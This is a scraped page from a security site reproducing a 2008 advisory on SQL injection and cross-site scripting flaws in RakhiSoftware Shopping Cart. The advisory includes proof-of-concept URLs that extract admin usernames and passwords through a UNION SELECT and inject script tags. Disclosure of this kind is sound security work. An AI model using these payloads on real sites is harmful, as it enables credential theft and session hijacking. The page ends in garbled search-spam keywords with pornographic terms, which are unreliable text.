exploits , vulnerabilities , articles , RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities

Title	RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
Published	2008-11-28-12:00AM
Updated	2008-12-02-10:41PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Charalambous Glafkos
Vulnerable	RakhiSoftware Shopping Cart 0
Not Vulnerable
Code	Attackers can exploit the issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user to follow a malicious URI.The following example URIs and proof of concept are available:http://www.example.com/rjbike_new/product.php?category_id=1+union%20select%20 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21%20from%20admin--&subcategory_id=1 http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1 http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script> Set Cookie: PHPSESSID='
TXT

Vulnerabilities - newest 10 RSS | More

2009-11-09 Apache Tomcat Windows Installer Insecure Password Vulnerability
2009-11-06 Google Chrome prior to 3.0.195.32 Multiple Security Vulnerabilities
2009-11-05 Asterisk SIP Response Username Enumeration Remote Information Disclosure Vulnerability
2009-11-05 Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability
2009-11-05 Linux Kernel r128 Driver CCE Initialization NULL Pointer Dereference Denial of Service Vulnerability
2009-11-05 Prototype JavaScript Framework Cross-Site Ajax Request Vulnerability
2009-11-05 Drupal Organic Groups Vocabulary Group Title HTML Injection Vulnerability
2009-11-05 IBM PowerHA Cluster Management Unauthorized Access Vulnerability
2009-11-05 HP Power Manager Unspecified Remote Code Execution Vulnerability
2009-11-05 Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Tue, 10 Nov 2009 00:11:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.136ys. www.saudis free 3gp s sexy photo video porn Futai monit tamilporn Www.sexira www.fuzhua malayalam search.php Microsoft bootymart news for c search/exp www.njhmjr pc 631 bootymart big pussy sexy vedio sex pics o kekeguoguo HOT MALLU vguestbook EURO.SEX xnxx 89 co postfix 2. www.naruto t457t free porn www.bjbwjc Sex tv 1 tamil actr Belkin wap.phone Phpadsnew free sex v RIMA anshengtai vzo rape Www.videos s.../porta www.xyzlov son cisco2600 p...n57.co honey ches www Hot se